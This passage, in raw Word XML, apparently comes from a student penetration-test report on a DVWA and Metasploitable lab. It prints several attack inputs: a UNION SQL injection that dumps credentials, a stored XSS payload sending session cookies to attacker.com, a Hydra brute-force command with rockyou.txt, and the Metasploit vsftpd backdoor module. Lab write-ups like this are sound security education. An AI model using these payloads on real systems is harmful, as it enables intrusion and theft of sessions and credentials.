            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5094428E" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3004" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62CA296F" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>OWASP A07</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009173EA" w:rsidRPr="004675E1" w14:paraId="73B6EC0B" w14:textId="77777777" w:rsidTr="005E3AF0">
        <w:trPr>
          <w:trHeight w:val="493"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4185E803" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>Login page exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="492282A6" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004675E1">
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFAEB27" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3004" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="741C10A1" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>OWASP A07</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31FAECAA" w14:textId="4A19054F" w:rsidR="00D216A7" w:rsidRDefault="00000000" w:rsidP="001741D5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc231238036"/>
      <w:bookmarkStart w:id="16" w:name="_Toc231851429"/>
      <w:bookmarkStart w:id="17" w:name="_Toc228099276"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="1C3C230A">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7C7469AD" w14:textId="77777777" w:rsidR="00DA5128" w:rsidRPr="00F97167" w:rsidRDefault="00DA5128" w:rsidP="00F97167"/>
    <w:p w14:paraId="04DE389C" w14:textId="6D0CAE90" w:rsidR="001741D5" w:rsidRDefault="002A2075" w:rsidP="001741D5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc231851430"/>
      <w:r w:rsidRPr="002A2075">
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidR="00DA5128">
        <w:t>, Malware and Social Engineering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="6CDF9237" w14:textId="4AB7A8B3" w:rsidR="00B07F4A" w:rsidRPr="00B07F4A" w:rsidRDefault="00E651A6" w:rsidP="00B07F4A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E651A6">
        <w:t>The four vectors of exploitation were run from the Kali Linux attacker VM, all of which were successful, resulting in complete OS compromise</w:t>
      </w:r>
      <w:r w:rsidR="009A15CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B07F4A" w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Refer Appendix D).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F92C89" w14:textId="77777777" w:rsidR="00B07F4A" w:rsidRPr="00B07F4A" w:rsidRDefault="00B07F4A" w:rsidP="00B07F4A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Manual SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E6002" w14:textId="77777777" w:rsidR="00B07F4A" w:rsidRPr="00B07F4A" w:rsidRDefault="00B07F4A" w:rsidP="00B07F4A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A UNION-based injection payload was submitted into DVWA's authentication form to extract backend credentials (OWASP Foundation, 2024a):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725F735" w14:textId="77777777" w:rsidR="00B07F4A" w:rsidRPr="00B07F4A" w:rsidRDefault="00B07F4A" w:rsidP="00B07F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos Slab Black" w:hAnsi="Aptos Slab Black"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Slab Black" w:hAnsi="Aptos Slab Black"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1' UNION SELECT user, password FROM users#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168974DD" w14:textId="77777777" w:rsidR="00B07F4A" w:rsidRPr="00B07F4A" w:rsidRDefault="00B07F4A" w:rsidP="00B07F4A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The server dumped all usernames and MD5 password hashes. Hashes were cracked using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CrackStation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, revealing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> credential pair. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07F4A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Refer Figures 10 &amp; 11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F5390F" w14:textId="78904D7D" w:rsidR="003C6ED6" w:rsidRDefault="00B07F4A" w:rsidP="00B07F4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DCE4C03" wp14:editId="3C03FB65">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3156585</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3129280" cy="1864995"/>
            <wp:effectExtent l="0" t="0" r="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5" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="13499" t="15253" r="11322" b="3254"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3129280" cy="1864995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002B6491">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4199154B" wp14:editId="1A90B1DC">
            <wp:extent cx="3111145" cy="18723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6" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="14045" t="12892" r="11679" b="3398"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3134562" cy="1886436"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD88F43" w14:textId="48CA13BB" w:rsidR="00AC0559" w:rsidRDefault="003C6ED6" w:rsidP="003C6ED6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &amp; 11: SQLi</w:t>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:t xml:space="preserve"> vulnerability exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390D9FFE" w14:textId="0091B401" w:rsidR="003139AF" w:rsidRPr="00477875" w:rsidRDefault="00000000" w:rsidP="00522E31">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="2CBA4B71">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A0D1D" w14:textId="77777777" w:rsidR="00522E31" w:rsidRPr="00522E31" w:rsidRDefault="00522E31" w:rsidP="00522E31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00522E31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098973F3" w14:textId="70DF2024" w:rsidR="00931144" w:rsidRPr="00931144" w:rsidRDefault="0010642C" w:rsidP="00931144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS: </w:t>
      </w:r>
      <w:r w:rsidR="00931144" w:rsidRPr="00931144">
        <w:t>When the user entered &lt;script&gt;alert('XSS')&lt;/script&gt; into an unencoded input field, the browser would display an alert message, verifying that the output field was not output-encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B79964" w14:textId="77777777" w:rsidR="00931144" w:rsidRPr="00931144" w:rsidRDefault="00931144" w:rsidP="00931144">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110DB9E9" w14:textId="7CBD6582" w:rsidR="00EB3658" w:rsidRDefault="0010642C" w:rsidP="0069276C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS: </w:t>
      </w:r>
      <w:r w:rsidRPr="0010642C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB094B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.location='http://attacker.com/steal?c='+document.cookie&lt;/script</w:t>
      </w:r>
      <w:r w:rsidR="009A15CA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A15CA" w:rsidRPr="009A15CA">
        <w:t>was injected into the guestbook form and stored in MariaDB to be automatically executed by any future visitors to the form, allowing for the theft of the session cookie</w:t>
      </w:r>
      <w:r w:rsidR="009A15CA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010642C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(OWASP Foundation, 2024b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94BE53" w14:textId="4C4C6C92" w:rsidR="00CE3FE4" w:rsidRPr="00EB3658" w:rsidRDefault="00237402" w:rsidP="00EB3658">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[Refer to Appendix E for Reflected and Stored XSS </w:t>
      </w:r>
      <w:r w:rsidR="00564BD6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>screenshots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35110D6C" w14:textId="07EBBB1E" w:rsidR="00887013" w:rsidRDefault="00000000" w:rsidP="00522E31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="36697CF6">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CF1728" w14:textId="77777777" w:rsidR="00564BD6" w:rsidRDefault="00564BD6" w:rsidP="0092441D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F78FBAB" w14:textId="77777777" w:rsidR="00564BD6" w:rsidRDefault="00564BD6" w:rsidP="0092441D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101D26A8" w14:textId="77777777" w:rsidR="00564BD6" w:rsidRDefault="00564BD6" w:rsidP="0092441D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB8FFB1" w14:textId="4B763006" w:rsidR="0092441D" w:rsidRDefault="00522E31" w:rsidP="0092441D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00522E31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Automated Password Brute-Force Testing (Hydra)</w:t>
      </w:r>
      <w:r w:rsidR="0092441D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4140073E" w14:textId="5E822A0F" w:rsidR="003C7848" w:rsidRDefault="003C7848" w:rsidP="003C6ED6">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="003C7848">
        <w:t>The wordlist rockyou.txt was used by Hydra to attack the login page</w:t>
      </w:r>
      <w:r w:rsidR="00C05A57">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767262FF" w14:textId="7D94FF4B" w:rsidR="003C7848" w:rsidRDefault="003C7848" w:rsidP="003C6ED6">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7848">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7848">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: hydra -l admin -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7848">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7848">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt 10.0.2.7 http-get-form "/dvwa/vulnerabilities/brute</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C7848">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/:username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C7848">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>=^USER^&amp;password=^PASS^&amp;Login=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C7848">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Login:F</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C7848">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">=incorrect" </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7848">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEDBE5D" w14:textId="5062B97A" w:rsidR="003C7848" w:rsidRDefault="003C7848" w:rsidP="003C6ED6">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="003C7848">
        <w:t xml:space="preserve">However, there was no rate limiting or account lockout, which enabled Hydra to crack the password for admin within minutes (van Hauser and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7848">
        <w:t>Maciejak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7848">
        <w:t>, 2023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5615C6" w14:textId="2A0E1FFC" w:rsidR="003C6ED6" w:rsidRDefault="000E50B7" w:rsidP="003C6ED6">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59575A14" wp14:editId="51D42BBE">
            <wp:extent cx="4572000" cy="14381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96125" cy="1445690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C226B84" w14:textId="04AC585B" w:rsidR="00522E31" w:rsidRDefault="003C6ED6" w:rsidP="003C6ED6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00564BD6">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>: Hydra in action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222C203" w14:textId="347BCAA2" w:rsidR="00541167" w:rsidRPr="00522E31" w:rsidRDefault="00000000" w:rsidP="00522E31">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="25E4821E">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882CA72" w14:textId="67C4A28A" w:rsidR="00522E31" w:rsidRPr="00522E31" w:rsidRDefault="0072685D" w:rsidP="00522E31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00522E31" w:rsidRPr="00522E31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Combined Burp Suite Proxy and Metasploit OS Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EAD1F" w14:textId="77777777" w:rsidR="00583238" w:rsidRDefault="00583238" w:rsidP="004553C6">
      <w:r w:rsidRPr="00583238">
        <w:t>Burp Suite sees an exposed PHPSESSID session token and user anti-CSRF tokens in plaintext during the HTTP POST login flow (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583238">
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583238">
        <w:t xml:space="preserve">, 2024). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF780F" w14:textId="25934D3E" w:rsidR="00583238" w:rsidRDefault="00583238" w:rsidP="004553C6">
      <w:r w:rsidRPr="00583238">
        <w:t xml:space="preserve">An unpatched </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583238">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583238">
        <w:t xml:space="preserve"> 2.3.4 version with a known backdoor (CVE-2011-2523) was found on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583238">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583238">
        <w:t xml:space="preserve"> VM (MITRE Corporation, 2011)</w:t>
      </w:r>
      <w:r w:rsidR="00C05A57">
        <w:t xml:space="preserve"> (Refer Appendix H)</w:t>
      </w:r>
      <w:r w:rsidRPr="00583238">
        <w:t>. The following module was run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1211C0EA" w14:textId="32242DD8" w:rsidR="004553C6" w:rsidRPr="008511CE" w:rsidRDefault="004553C6" w:rsidP="004553C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008511CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008511CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008511CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r w:rsidR="008511CE" w:rsidRPr="008511CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2688A509" w14:textId="77777777" w:rsidR="006829ED" w:rsidRDefault="004553C6" w:rsidP="004553C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
